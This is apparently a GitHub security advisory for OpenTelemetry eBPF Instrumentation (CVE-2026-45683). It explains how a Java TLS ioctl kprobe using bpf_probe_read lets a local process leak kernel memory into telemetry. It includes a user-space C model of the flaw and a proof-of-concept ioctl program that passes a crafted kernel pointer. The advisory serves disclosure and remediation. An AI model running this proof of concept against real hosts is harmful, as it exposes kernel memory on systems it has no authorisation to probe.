
OpenTelemetry eBPF Instrumentation: Java TLS ioctl kprobe allows kernel memory disclosure

Low severity · GitHub Reviewed · Published May 12, 2026 in open-telemetry/opentelemetry-ebpf-instrumentation · Updated Jun 9, 2026

Package

gomod go.opentelemetry.io/obi (Go)

Affected versions

< 0.9.0

Patched versions

0.9.0

Description

Summary

The Java TLS ioctl probe reads user-controlled ioctl pointers with bpf_probe_read instead of bpf_probe_read_user. An instrumented local process can therefore point OBI at kernel memory and cause that memory to be copied into telemetry.

Details

The vulnerable path is in bpf/generictracer/java_tls.c. The kprobe hooks do_vfs_ioctl, filters on fd == 0 and the Java TLS magic command, and then treats the third ioctl argument as a structured buffer. It reads fields from that pointer using bpf_probe_read, including:

  • the operation byte from arg
  • connection metadata from arg + 1
  • the payload length from arg + 1 + sizeof(connection_info_t)

If len > 0, it computes buf = arg + 1 + sizeof(connection_info_t) + sizeof(u32) and passes that pointer into handle_buf_with_connection.

The next stage, bpf/generictracer/k_tracer_defs.h, uses bpf_probe_read(args->small_buf, MIN_HTTP2_SIZE, (void *)args->u_buf); on the supplied pointer and tail-calls deeper protocol logic. The HTTP protocol path then reads from u_buf and emits the bytes through bpf_ringbuf_output in bpf/generictracer/protocol_http.h.

Because the ioctl pointer originates in user space, the probe should read it with bpf_probe_read_user and validate every length before copying. Using bpf_probe_read instead lets an instrumented process supply a kernel pointer and have kernel-resident bytes copied into telemetry.
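The following is an added, user-space model of the parse stage described above; it is not OBI's code. Two stub helpers stand in for the BPF helpers (model_probe_read copies from any address the way the legacy helper does; model_probe_read_user refuses anything outside a constructed "user" buffer), and a single parse routine, parameterised by the helper, applies the layout from the advisory (op byte, connection_info_t, u32 len, payload) together with the strict length check the fix calls for. The connection_info_t layout, the buffer sizes and the SECRET!! marker are constructed for the example.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

/* Hypothetical stand-in for OBI's connection_info_t; only its size matters here. */
typedef struct {
    uint32_t src_ip;
    uint32_t dst_ip;
    uint16_t src_port;
    uint16_t dst_port;
} connection_info_t;

/* Constructed address-space model: one buffer plays the calling process's
 * user memory, another plays kernel-resident memory the process must never read. */
static uint8_t user_region[512];
static uint8_t kernel_region[64];

/* Model of the legacy bpf_probe_read helper used by the vulnerable probe:
 * it copies from whatever address it is handed. */
static long model_probe_read(void *dst, uint32_t size, const void *src)
{
    memcpy(dst, src, size);
    return 0;
}

/* Model of bpf_probe_read_user: refuses any range that is not entirely inside
 * user memory and zero-fills the destination, mirroring the helper's -EFAULT. */
static long model_probe_read_user(void *dst, uint32_t size, const void *src)
{
    uintptr_t s = (uintptr_t)src;
    uintptr_t lo = (uintptr_t)user_region;
    uintptr_t hi = lo + sizeof user_region;
    if (s < lo || s + size > hi || s + size < s) {
        memset(dst, 0, size);
        return -14; /* -EFAULT */
    }
    memcpy(dst, src, size);
    return 0;
}

typedef long (*probe_read_fn)(void *dst, uint32_t size, const void *src);

/* The probe's parse stage, written once and parameterised by the read helper.
 * Returns the payload length copied into out, 0 if len == 0, -1 if a read was
 * refused, -2 if len exceeds the caller's bound (the strict length check). */
static long parse_java_tls_arg(probe_read_fn rd, const void *arg, uint8_t *out, uint32_t out_cap)
{
    const uint8_t *p = (const uint8_t *)arg;
    uint8_t op;
    connection_info_t conn;
    uint32_t len;

    if (rd(&op, sizeof op, p) != 0) return -1;
    if (rd(&conn, sizeof conn, p + 1) != 0) return -1;
    if (rd(&len, sizeof len, p + 1 + sizeof conn) != 0) return -1;
    if (len == 0) return 0;
    if (len > out_cap) return -2;           /* strict length validation */
    if (rd(out, len, p + 1 + sizeof conn + sizeof len) != 0) return -1;
    return (long)len;
}

/* Writes a well-formed request into the user buffer and returns its address. */
static const void *build_user_request(const uint8_t *payload, uint32_t len)
{
    connection_info_t conn = {0};
    uint8_t *p = user_region;
    memset(user_region, 0, sizeof user_region);
    p[0] = 1; /* op byte */
    memcpy(p + 1, &conn, sizeof conn);
    memcpy(p + 1 + sizeof conn, &len, sizeof len);
    memcpy(p + 1 + sizeof conn + sizeof len, payload, len);
    return user_region;
}

/* Constructed kernel-resident bytes that happen to parse as a request,
 * standing in for the "passes the early checks" case in the advisory. */
static const void *build_kernel_record(void)
{
    static const uint8_t marker[8] = "SECRET!!";
    uint32_t len = sizeof marker;
    connection_info_t conn = {0};
    memset(kernel_region, 0, sizeof kernel_region);
    kernel_region[0] = 1;
    memcpy(kernel_region + 1, &conn, sizeof conn);
    memcpy(kernel_region + 1 + sizeof conn, &len, sizeof len);
    memcpy(kernel_region + 1 + sizeof conn + sizeof len, marker, sizeof marker);
    return kernel_region;
}

int main(void)
{
    uint8_t out[256];
    const uint8_t req_payload[] = "GET / HTTP/1.1\r\n";
    const void *req = build_user_request(req_payload, (uint32_t)(sizeof req_payload - 1));
    const void *krec = build_kernel_record();

    printf("user request, read_user helper: %ld bytes\n",
           parse_java_tls_arg(model_probe_read_user, req, out, sizeof out));
    printf("kernel pointer, legacy helper:  %ld bytes copied\n",
           parse_java_tls_arg(model_probe_read, krec, out, sizeof out));
    printf("kernel pointer, read_user helper: %ld (refused)\n",
           parse_java_tls_arg(model_probe_read_user, krec, out, sizeof out));
    return 0;
}
```

With the legacy helper the kernel-resident record is copied out intact; with the user-space helper the very first read fails and nothing reaches the output buffer. In the real BPF program the length bound must additionally be a constant the verifier can prove (for example by masking len against a fixed buffer size) so that the copy into the per-CPU buffer is provably in range.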

PoC

A complete lab reproduction requires:

  1. a vulnerable build of OBI with Java TLS instrumentation enabled
  2. a host capable of loading the BPF program
  3. a local process that issues the Java TLS magic ioctl with an attacker-controlled pointer

Suggested reproduction steps:

git checkout v0.0.0-rc.1+build
make build
sudo ./bin/obi

Then run a local helper that issues the matching ioctl command against fd=0 and supplies a crafted pointer.

// save as /tmp/ioctl_kernel_ptr.c
#include <stdio.h>
#include <stdint.h>
#include <sys/ioctl.h>
#include <unistd.h>

#define JAVA_TLS_MAGIC 0x0b10b1

int main(void) {
  void *ptr = (void *)0xffff888000000000ULL;
  long rc = ioctl(0, JAVA_TLS_MAGIC, ptr);
  printf("ioctl rc=%ld\n", rc);
  return 0;
}

Compile and run:

cc -O2 -o /tmp/ioctl_kernel_ptr /tmp/ioctl_kernel_ptr.c
/tmp/ioctl_kernel_ptr

On a vulnerable system, if the supplied pointer references readable kernel memory and the bytes there satisfy the expected Java TLS structure well enough to pass the early checks, OBI reads from that address and emits the resulting bytes into telemetry. Beyond compiling the helper, reproduction needs a host session with sufficient BPF capability to load and inspect the probe.

Impact

This is a local kernel memory disclosure primitive reachable from unprivileged instrumented processes. It affects deployments that enable Java TLS support. Successful exploitation can expose kernel memory contents to the privileged OBI agent and then to downstream telemetry systems.

References

Published to the GitHub Advisory Database May 18, 2026
Reviewed May 18, 2026
Published by the National Vulnerability Database Jun 2, 2026
Last updated Jun 9, 2026

Severity

Low


CVSS v3 base metrics

Attack vector: Local
Attack complexity: Low
Privileges required: Low
User interaction: None
Scope: Changed
Confidentiality: Low
Integrity: None
Availability: None

Vector string: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N

EPSS score

Exploit Prediction Scoring System (EPSS): (3rd percentile). Data provided by FIRST.

Weaknesses

Buffer Under-read

The product reads from a buffer using buffer access mechanisms such as indexes or pointers that reference memory locations prior to the targeted buffer.

Exposure of Sensitive Information to an Unauthorized Actor

The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information.

CVE ID

CVE-2026-45683

GHSA ID

GHSA-fjq3-ffvr-vm46
